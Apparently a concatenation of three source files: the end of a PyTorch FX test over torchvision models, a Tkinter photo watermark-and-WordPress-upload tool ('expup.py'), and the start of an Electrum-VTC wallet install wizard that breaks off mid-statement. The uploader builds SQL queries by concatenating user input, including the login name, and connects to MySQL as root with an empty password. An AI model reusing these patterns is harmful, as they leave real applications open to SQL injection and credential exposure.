setattr(torch.nn.functional, name, no)
@classmethod
def tearDownClass(cls):
for name in cls.TO_PATCH.keys():
setattr(torch.nn.functional, name, cls.TO_PATCH[name])
TestFunctionalTracing.generate_tests()
instantiate_device_type_tests(TestOperatorSignatures, globals())
@skipIfNoTorchVision
class TestVisionTracing(JitTestCase):
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
INCONSISTENT_TYPE = (
RuntimeError,
r"Return value was annotated as having type __torch__.torchvision.models[.\w]+ but is actually of type Tensor"
)
UNTRACEABLE_MODELS = {
"fasterrcnn_resnet50_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_320_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_fpn": PROXY_ITERATED,
"maskrcnn_resnet50_fpn": PROXY_ITERATED,
"keypointrcnn_resnet50_fpn": PROXY_ITERATED,
"retinanet_resnet50_fpn": PROXY_ITERATED,
}
UNSCRIPTABLE_MODELS = {
"googlenet": INCONSISTENT_TYPE,
"inception_v3": INCONSISTENT_TYPE,
}
output_transform = {
"fcn_resnet50": lambda x: x["out"],
"fcn_resnet101": lambda x: x["out"],
"deeplabv3_resnet50": lambda x: x["out"],
"deeplabv3_resnet101": lambda x: x["out"],
"deeplabv3_mobilenet_v3_large": lambda x: x["out"],
"lraspp_mobilenet_v3_large": lambda x: x["out"],
"fasterrcnn_resnet50_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_320_fpn": lambda x: x[1],
"maskrcnn_resnet50_fpn": lambda x: x[1],
"keypointrcnn_resnet50_fpn": lambda x: x[1],
"retinanet_resnet50_fpn": lambda x: x[1],
}
@classmethod
def generate_test_fn(cls, name, model_fn, x, kwargs):
def run_test(self):
model = model_fn(**kwargs)
model = model.eval()
if name in self.UNTRACEABLE_MODELS:
err, exc = self.UNTRACEABLE_MODELS[name]
with self.assertRaisesRegex(err, exc):
graph = symbolic_trace(model)
else:
out_transform = self.output_transform.get(name, lambda x: x)
graph : torch.fx.GraphModule = symbolic_trace(model)
a = out_transform(model(x))
b = out_transform(graph(x))
self.assertEqual(a, b)
if name in self.UNSCRIPTABLE_MODELS:
err, exc = self.UNSCRIPTABLE_MODELS[name]
with self.assertRaisesRegex(err, exc):
script = torch.jit.script(graph)
else:
script = torch.jit.script(graph)
c = out_transform(script(x))
self.assertEqual(a, c)
return run_test
@classmethod
def generate_classification_tests(cls):
for k, v in torchvision_models.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_' + k
x = torch.rand(1, 3, 299, 299) if k in ['inception_v3'] else torch.rand(1, 3, 224, 224)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_segmentation_tests(cls):
for k, v in torchvision_models.segmentation.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_segmentation_' + k
x = torch.rand(1, 3, 32, 32)
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_detection_tests(cls):
for k, v in torchvision_models.detection.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_detection_' + k
x = [torch.rand(3, 300, 300)]
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_video_tests(cls):
for k, v in torchvision_models.video.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_video_' + k
x = torch.rand(1, 3, 4, 112, 112)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_tests(cls):
cls.generate_classification_tests()
cls.generate_detection_tests()
cls.generate_segmentation_tests()
cls.generate_video_tests()
if HAS_TORCHVISION:
TestVisionTracing.generate_tests()
if __name__ == '__main__':
run_tests()
|
expup.py
|
#=============================================================#
# #
# EL EXPRESO DEL DEPORTE #
# ExpUp - Image Uploader #
#-------------------------------------------------------------#
# Developed by: Luis Jose Lopez Miranda #
# This software is licensed under the MIT License (Expat) #
# #
#=============================================================#
# Import all necessary modules
#1 - Tkinter
import tkinter as tk
from tkinter import filedialog
from tkinter import messagebox
from tkinter import ttk
#2 - OS File I/O
import os
from os import listdir
from os.path import isfile, join, exists
#3 - Image Manipulation
import PIL
from PIL import Image, ImageTk, ImageEnhance
#4 - MySQL Integration
import pymysql
import sys
#5 - Internet I/O
import urllib.request,io
#6 - Passlib Hasher
import passlib
from passlib.hash import phpass
#7 - Wordpress Integration
from wordpress_xmlrpc import Client, WordPressPost
from wordpress_xmlrpc.compat import xmlrpc_client
from wordpress_xmlrpc.methods import media, posts
#8 - Time
import time
#9 - Threading
import threading
#10 - Mimetypes
import mimetypes
#11 - Random
import random
#12 - SMTP for email integration
import smtplib
#### Defines
# Software Info
SOFTWARE_NAME = "ExpUp"
SOFTWARE_DESCRIPTION = "Procesador de imagenes para El Expreso del Deporte"
VERSION = "0.1b"
AUTHOR = "Luis Jose Lopez Miranda"
AUTHOR_LINK = ""
LAST_REV = "11 de enero, 2015"
# Links
MAIN_IMAGE = 'images/header_ES.png'
WP_URL = 'http://elexpresodeldeporte.com/xmlrpc.php'
TEMP_FOLDER_NAME = "_temp/"
ICON_URL = 'images/expup.ico'
# MySQL-WP Information
WP_MYSQL_HOST = "localhost"
WP_MYSQL_USER = "root"
WP_MYSQL_PASS = ""
WP_MYSQL_DB = "wp-db"
# MySQL-EXPUP Information
MYSQL_HOST = "localhost"
MYSQL_USER = "root"
MYSQL_PASS = ""
MYSQL_DB = "expup"
# Size
MAX_W = 720
MAX_H = 640
# Colors
MAIN_BG = "#FFFFFF"
S_BG = "#000000"
TITLE_BG = "#FFFFFF"
I_BG = "#FF3300"
I_TEXT = "#FF3300"
MAIN_TEXT = "#000000"
S_TEXT = "#FFFFFF"
# Spanish texts
MY_SQL_ERROR = "Error en la conexion MySQL"
MAKE_SURE_INTERNET = "Asegurese de estar conectado a internet"
FIRST_STEP = "Seleccione la carpeta con las fotos que desea subir"
SELECT_FOLDER = "Seleccionar carpeta"
LOG_IN_PLEASE = "Por favor ingrese sus datos"
LOG_IN_TITLE = "Ingreso de Usuario"
NO_FOLDER_SELECTED = "No se ha seleccionado una carpeta"
FILES_SELECTED = " imagenes seleccionadas!"
NO_FILES_SELECTED = "La carpeta no contiene imagenes validas"
PLEASE_SELECT_FOLDER = "Por favor seleccione una carpeta"
USERNAME = "Nombre de usuario: "
PASSWORD = "Contraseña: "
SUCCESSFUL_LOGIN = "Conexion exitosa"
UNSUCCESSFUL_LOGIN = "Conexion fallida"
S_LOGIN_DESC = "Puede proceder a utilizar el programa"
U_LOGIN_DESC = "Credenciales no validas. Vuelva a intentarlo"
USER_NOT_FOUND = "Usuario no encontrado en la base de datos"
USER = "Usuario:"
ADMIN = "Administrador"
COL = "Colaborador"
INV = "Invitado"
PREVIEW = "Foto de ejemplo"
CONNECTION_ERROR = "Error de conexion con internet"
SET_NAME = "Escriba el nombre de la actividad"
UPLOAD = "Subir fotos"
NO_NAME = "Necesita establecer un nombre de archivo"
RANK_NOT_ENOUGH = "Usted no tiene el rango necesario para subir fotos."
BASE_STATE = "Trabajando..."
UPLOADING = "Subiendo: "
PROCESSING = "Procesando: "
FINISHED = "Finalizado!"
MENU_SETTINGS = "Opciones"
MENU_OPTION_QUIT = "Salir"
SHUTDOWN_FINISH = "Apagar la computadora al finalizar"
WILL_SHUTDOWN = "La computadora se apagara automaticamente despues de subir las fotos.\nPresione Aceptar para continuar, o Cancelar para volver. "
WARNING = "Advertencia"
CREDITS_INFO = SOFTWARE_NAME + "\n" + SOFTWARE_DESCRIPTION + "- Version: " + VERSION + "\nDesarrollado y diseñado por: Luis Jose Lopez Miranda\nUltima revision: " + LAST_REV
CREDITS = "Creditos"
WISH_TO_QUIT = "¿Realmente desea salir?"
PROCESS_ONGOING = "Las fotos se estas subiendo. Si cierra el programa, el proceso se interrumpirá.\nPresione Aceptar para salir o Cancelar para continuar"
# Associative fetching / By: Ian Howson
def FetchOneAssoc(cursor) :
data = cursor.fetchone()
if data == None :
return None
desc = cursor.description
dict = {}
for (name, value) in zip(desc, data) :
dict[name[0]] = value
return dict
logged = False
dirname = ""
valid_dir = False
images = []
user = ""
real_name = ""
rank = ""
act_name = ""
can_upload = False
password_sec = ""
step = 0
# Create a window
root = tk.Tk()
root.title(SOFTWARE_NAME + " || Version: " + VERSION)
root.resizable(width=False, height=False)
root.configure(background=S_BG)
root.option_add('*tearOff', tk.FALSE)
root.wm_iconbitmap(ICON_URL)
def askIfQuit():
if (step > 3):
if messagebox.askokcancel(WISH_TO_QUIT, PROCESS_ONGOING):
root.destroy()
sys.exit()
else:
root.destroy()
sys.exit()
def handler():
t2=threading.Thread(target=askIfQuit)
t2.start()
root.protocol("WM_DELETE_WINDOW", handler)
def showCredits():
messagebox.showinfo(CREDITS, CREDITS_INFO, parent=root)
# Create the menubar
menubar = tk.Menu(root)
root['menu'] = menubar
menu_settings = tk.Menu(menubar)
menubar.add_cascade(menu=menu_settings, label=MENU_SETTINGS)
menubar.add_command(label=CREDITS, command=showCredits)
# Set the variable for shutdown
shutdown_on_finish = tk.BooleanVar()
menu_settings.add_checkbutton(label=SHUTDOWN_FINISH, variable=shutdown_on_finish, onvalue=True, offvalue=False)
shutdown_on_finish.set(False)
menu_settings.add_command(label=MENU_OPTION_QUIT, command=handler)
# Set additional elements on the main window
title = tk.Frame(root, bg=MAIN_BG, width=MAX_W)
header_img = tk.PhotoImage(file=MAIN_IMAGE)
header_label = tk.Label(title, bg = MAIN_BG, image = header_img).pack()
title.pack()
progress = tk.Frame(root, bg=I_BG, width=MAX_W)
#Test DB Connection
try:
conn = pymysql.connect(host=MYSQL_HOST, user=MYSQL_USER, passwd=MYSQL_PASS, db=MYSQL_DB)
wp_conn = pymysql.connect(host=WP_MYSQL_HOST, user=WP_MYSQL_USER, passwd=WP_MYSQL_PASS, db=WP_MYSQL_DB)
except:
messagebox.showinfo(MY_SQL_ERROR, MAKE_SURE_INTERNET, icon="warning", parent = root)
root.quit()
sys.exit()
login_w = tk.Toplevel(root, takefocus = True)
login_w.wm_iconbitmap(ICON_URL)
instruct = tk.Frame(root, width=MAX_W, bg = S_BG, padx=10)
preview = tk.Frame(root, width=MAX_W, bg = S_BG)
folder_label = tk.Label(instruct, fg = S_TEXT, text = NO_FOLDER_SELECTED, bg = S_BG)
images_layout = tk.Frame(root, width=MAX_W, bg = S_BG)
images_label = tk.Label(instruct, fg = S_TEXT, text = PLEASE_SELECT_FOLDER, bg = S_BG)
preview_canvas = tk.Canvas ( preview, width=MAX_W/2, height=MAX_H/2.5, bg = I_BG )
m_name = tk.StringVar()
def first_step():
global step
step = 1
login_w.title(LOG_IN_TITLE)
textologin = tk.Label(login_w, text=LOG_IN_PLEASE).pack()
user_label = tk.Label(login_w, text=USERNAME).pack()
username = tk.StringVar()
name = tk.Entry(login_w, textvariable=username)
name.pack()
pass_label = tk.Label(login_w, text=PASSWORD).pack()
password = tk.StringVar()
pswd = tk.Entry(login_w, textvariable=password, show = '*')
pswd.pack()
name.focus_set()
login_w.transient(root)
login_w.grab_set()
login_w.geometry('400x120')
login = tk.Button(login_w, text="Login", command=lambda: verifyUser(username.get(), password.get()))
login.pack()
root.wait_window(login_w)
def secondStep():
global step
step = 2
user_label = tk.Label(title, bg = MAIN_BG, fg = MAIN_TEXT, text=USER + " " + real_name + ", " + rank).pack()
if (can_upload):
label_instruct1 = tk.Label(instruct, text=FIRST_STEP, bg = S_BG, fg=I_TEXT).pack()
folder_label.pack()
select_folder.pack()
instruct.pack()
else:
tk.Label(title, bg = I_BG, fg = S_TEXT, text=RANK_NOT_ENOUGH).pack()
def startProcess():
t1=threading.Thread(target=processImages)
t1.start()
upload_button = tk.Button(preview, text=UPLOAD, command=startProcess, bg = S_BG, fg = S_TEXT)
def thirdStep():
global step, conn
m_img = Image.open(join(dirname+"/", random.choice(images)))
if (step < 3):
tk.Label(preview, text=SET_NAME, fg=I_TEXT, bg=S_BG).pack()
name_entry = tk.Entry(preview, textvariable=m_name, bg=MAIN_BG, width=50)
name_entry.pack()
preview_img = applyWatermark(m_img, getWatermark())
preview_img.thumbnail((MAX_W/2, MAX_H/2), Image.ANTIALIAS)
preview_label = tk.Label(preview, bg = S_BG, fg = I_TEXT, text=PREVIEW).pack()
photo = ImageTk.PhotoImage(preview_img)
pr_img = tk.Label(preview, image=photo)
pr_img.image = photo
preview_canvas.create_image(MAX_W/4,MAX_H/5, image = photo)
preview_canvas.pack()
upload_button.pack()
preview.pack()
else:
preview_img = applyWatermark(m_img, getWatermark())
preview_img.thumbnail((MAX_W/2, MAX_H/2), Image.ANTIALIAS)
preview_label = tk.Label(preview, bg = S_BG, fg = I_TEXT, text=PREVIEW).update()
photo = ImageTk.PhotoImage(preview_img)
pr_img = tk.Label(preview, image=photo)
pr_img.image = photo
preview_canvas.delete("all")
preview_canvas.create_image(MAX_W/4,MAX_H/5, image = photo)
preview_canvas.update()
step = 3
def getHeightStd():
cur = conn.cursor()
if (cur.execute("SELECT height FROM settings")):
r = FetchOneAssoc(cur)
cur.close()
return (r["height"])
else:
messagebox.showinfo(UNSUCCESSFUL_LOGIN, USER_NOT_FOUND, icon="warning", parent=root)
def getWidthStd():
cur = conn.cursor()
if (cur.execute("SELECT width FROM settings")):
r = FetchOneAssoc(cur)
cur.close()
return (r["width"])
else:
messagebox.showinfo(UNSUCCESSFUL_LOGIN, USER_NOT_FOUND, icon="warning", parent=root)
def getWatermarkURL():
cur = conn.cursor()
if (cur.execute("SELECT watermark FROM settings")):
r = FetchOneAssoc(cur)
cur.close()
return (r["watermark"])
else:
messagebox.showinfo(UNSUCCESSFUL_LOGIN, USER_NOT_FOUND, icon="warning", parent=root)
def verifyUser(u, p):
global user, real_name, rank, password_sec, wp_conn
#if (wp_conn):
cur = wp_conn.cursor()
if (cur.execute("SELECT * FROM wp_users WHERE user_login = '"+u+"'")):
r = FetchOneAssoc(cur)
cur.close()
if (phpass.verify(p,(r["user_pass"]))):
password_sec = p
login_w.destroy()
logged = True
user = u
real_name = r["display_name"]
rank = getRank(r["ID"])
secondStep()
else:
messagebox.showinfo(UNSUCCESSFUL_LOGIN, U_LOGIN_DESC, icon="warning", parent=root)
else:
messagebox.showinfo(UNSUCCESSFUL_LOGIN, MAKE_SURE_INTERNET, icon="warning", parent=root)
#else:
#wp_conn = pymysql.connect(host=WP_MYSQL_HOST, user=WP_MYSQL_USER, passwd=WP_MYSQL_PASS, db=WP_MYSQL_DB)
#verifyUser(u, p)
# List all current images
def list_images(folder):
pictures = [ f for f in listdir(folder) if isfile(join(dirname,f)) and (f.endswith(".jpg") or f.endswith(".png") or f.endswith(".JPG") or f.endswith(".PNG")) ]
return pictures
def updateFolderLabel(content):
global folder_label
folder_label.config(text=content)
def selectFolder():
global dirname
global folder_label
global images
dirname = filedialog.askdirectory(mustexist = True)
if (dirname != ""):
updateFolderLabel(dirname)
images = list_images(dirname)
if (isValidDir()):
thirdStep()
select_folder = tk.Button(instruct, text=SELECT_FOLDER, command=selectFolder, bg = S_BG, fg = S_TEXT)
# Apply watermark, by hasanatkazmi - modified by Luis Jose Lopez Miranda
def applyWatermark(im, mark):
if im.mode != 'RGBA':
im = im.convert('RGBA')
layer = Image.new('RGBA', im.size, (0,0,0,0))
position = (im.size[0]-mark.size[0], im.size[1]-mark.size[1])
layer.paste(mark, position)
watermarked = Image.composite(layer, im, layer)
return watermarked
def getExt(file):
if(file.endswith(".jpg") or file.endswith(".JPG")):
return ".jpg"
else:
return ".png"
def isValidDir():
amount_of_images = str(len(images))
images_label.pack()
if (len(images) > 0):
images_label.config(text = amount_of_images + FILES_SELECTED)
return True
else:
images_label.config(text = NO_FILES_SELECTED)
return False
def writeImage(img, name):
if not os.path.exists(TEMP_FOLDER_NAME):
os.makedirs(TEMP_FOLDER_NAME)
img.save( join(TEMP_FOLDER_NAME, name))
def uploadImage(loc, name):
client = Client(WP_URL, user, password_sec)
with open(join(loc,name), "rb") as img:
data = {
'name': name,
'bits': xmlrpc_client.Binary(img.read()),
'type': 'image/jpeg',
}
response = client.call(media.UploadFile(data))
os.remove(join(loc,name))
def processImages():
global step
act_name = m_name.get()
if (shutdown_on_finish.get() == False):
if (act_name != ""):
upload_button['state'] = 'disabled'
select_folder['state'] = 'disabled'
step = 4
mark = getWatermark()
size = getWidthStd(), getHeightStd()
i = 0
upload_progress = ttk.Progressbar(progress, orient='horizontal', mode='indeterminate')
upload_progress.pack(expand=True, fill=tk.BOTH, side=tk.TOP)
v = tk.StringVar()
current_label = tk.Label(progress, textvariable=v, bg = I_BG)
current_label.pack()
v.set(BASE_STATE)
progress.pack(expand=True, fill=tk.BOTH, side=tk.TOP)
upload_progress.start(50)
for file in images:
full_name = act_name + "_" + str(i) + "_" + time.strftime("%d_%m_%Y") + getExt(file)
full_path = TEMP_FOLDER_NAME + full_name
v.set(PROCESSING + " " + full_name)
m_img = Image.open(join(dirname+"/", file))
img = applyWatermark(m_img, mark)
img.thumbnail(size, Image.ANTIALIAS)
writeImage(img, full_name)
v.set(UPLOADING + " " + full_name)
uploadImage(TEMP_FOLDER_NAME, full_name)
i += 1
upload_progress.stop()
upload_progress.destroy()
v.set(FINISHED)
end()
else:
messagebox.showinfo("Error", NO_NAME, icon="warning", parent=root)
else:
if messagebox.askokcancel(title=WARNING, message=WILL_SHUTDOWN, parent=root):
if (act_name != ""):
upload_button['state'] = 'disabled'
select_folder['state'] = 'disabled'
step = 4
mark = getWatermark()
size = getWidthStd(), getHeightStd()
i = 0
upload_progress = ttk.Progressbar(progress, orient='horizontal', mode='indeterminate')
upload_progress.pack(expand=True, fill=tk.BOTH, side=tk.TOP)
v = tk.StringVar()
current_label = tk.Label(progress, textvariable=v, bg = I_BG)
current_label.pack()
v.set(BASE_STATE)
progress.pack(expand=True, fill=tk.BOTH, side=tk.TOP)
upload_progress.start(50)
for file in images:
full_name = act_name + "_" + str(i) + "_" + time.strftime("%d_%m_%Y") + getExt(file)
full_path = TEMP_FOLDER_NAME + full_name
v.set(PROCESSING + " " + full_name)
m_img = Image.open(join(dirname+"/", file))
img = applyWatermark(m_img, mark)
img.thumbnail(size, Image.ANTIALIAS)
writeImage(img, full_name)
v.set(UPLOADING + " " + full_name)
uploadImage(TEMP_FOLDER_NAME, full_name)
i += 1
upload_progress.stop()
upload_progress.destroy()
v.set(FINISHED)
end()
def wpConnect(u,p):
wp = Client(WP_SITE_URL, u, p)
return wp
def getWatermark():
try:
path = io.BytesIO(urllib.request.urlopen(getWatermarkURL()).read())
watermark = Image.open(path)
return watermark
except:
messagebox.showinfo(CONNECTION_ERROR, MAKE_SURE_INTERNET, icon="warning", parent=root)
def getRank(ID):
global can_upload
m_id = str(ID)
cur = wp_conn.cursor()
if (cur.execute("SELECT meta_value FROM wp_usermeta WHERE user_id = '"+m_id+"' AND meta_key = 'wp_user_level'")):
r = FetchOneAssoc(cur)
cur.close()
rank = int(r['meta_value'])
if (rank >= 10):
can_upload = True
return ADMIN
elif (rank > 1):
can_upload = True
return COL
else:
can_upload = False
return INV
else:
print("Error")
def recordData(user, name, amount, rank):
global conn
cur = conn.cursor()
if (cur.execute("INSERT INTO `logs` (user ,name ,amount ,rank ) VALUES ( '"+user+"', '"+name+"', '"+amount+"', '"+rank+"' );")):
cur.close()
print (rank + " " + user + " ha subido "+amount+" fotos con el nombre: "+name+".")
else:
print("Error")
def getAdminEmail():
cur = conn.cursor()
if (cur.execute("SELECT email FROM settings")):
r = FetchOneAssoc(cur)
cur.close()
return (r["email"])
else:
messagebox.showinfo(UNSUCCESSFUL_LOGIN, USER_NOT_FOUND, icon="warning", parent=root)
def reset():
dirname = ""
valid_dir = False
images = []
act_name = ""
step = 0
preview.pack_forget()
select_folder['state'] = 'normal'
instruct.update()
def end():
global user, rank, m_name, images
os.rmdir(TEMP_FOLDER_NAME)
recordData(user, m_name.get(), str(len(images)), rank)
if (shutdown_on_finish.get()):
os.system("shutdown /s")
else:
reset()
first_step()
root.mainloop()
|
installwizard.py
|
import sys
import os
from PyQt4.QtGui import *
from PyQt4.QtCore import *
import PyQt4.QtCore as QtCore
import electrum_vtc as electrum
from electrum_vtc import Wallet, WalletStorage
from electrum_vtc.util import UserCancelled, InvalidPassword
from electrum_vtc.base_wizard import BaseWizard
from electrum_vtc.i18n import _
from seed_dialog import SeedLayout, KeysLayout
from network_dialog import NetworkChoiceLayout
from util import *
from password_dialog import PasswordLayout, PW_NEW
class GoBack(Exception):
pass
MSG_GENERATING_WAIT = _("Electrum is generating your addresses, please wait...")
MSG_ENTER_ANYTHING = _("Please enter a seed phrase, a master key, a list of "
"Vertcoin addresses, or a list of private keys")
MSG_ENTER_SEED_OR_MPK = _("Please enter a seed phrase or a master key (xpub or xprv):")
MSG_COSIGNER = _("Please enter the master public key of cosigner #%d:")
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_RESTORE_PASSPHRASE = \
_("Please enter your seed derivation passphrase. "
"Note: this is NOT your encryption password. "
"Leave this field empty if you did not use one or are unsure.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
import math
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, QtCore.Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, storage)
QDialog.__init__(self, None)
self.setWindowTitle('Electrum-VTC - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for base base class
self.plugins = plugins
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.connect(self, QtCore.SIGNAL('accept'), self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addLayout(inner_vbox)
hbox.setStretchFactor(inner_vbox, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electrum-vtc.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def run_and_get_wallet(self):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electrum-VTC wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path = unicode(QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder))
if path:
self.name_e.setText(path)
def on_filename(filename):
filename = unicode(filename)
path = os.path.join(wallet_folder, filename.encode('utf8'))
try:
self.storage = WalletStorage(path)
except IOError:
self.storage = None
if self.storage:
if not self.storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
elif self.storage.file_exists() and self.storage.is_encrypted():
msg = _("This file is encrypted.") + '\n' + _('Enter your password or choose another file.')
pw = True
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n.decode('utf8'))
while True:
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if self.loop.exec_() != 2: # 2 = next
return
if not self.storage.file_exists():
break
if self.storage.file_exists() and self.storage.is_encrypted():
password = unicode(self.pw_e.text())
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e), _('OK'))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e), _('OK'))
return
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '%s' contains multiple accounts, which are no longer supported in Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?"%path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
if self.storage.requires_upgrade():
self.hide()
msg = _("The format of your wallet '%s' must be upgraded for Electrum. This change will not be backward compatible"%path)
if not self.question(msg):
return
self.storage.upgrade()
self.show_warning(_('Your wallet was upgraded successfully'))
self.wallet = Wallet(self.storage)
return self.wallet
action = self.storage.get_action()
if action and action != 'new':
self.hide()
msg = _("The file '%s' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?") % path
if not self.question(msg):
if self.question(_("Do you want to delete '%s'?") % path):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(filename).scaledToWidth(60))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid):
slayout = KeysLayout(parent=self, title=message, is_valid=is_valid)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next):
return self.text_input(title, message, is_valid)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
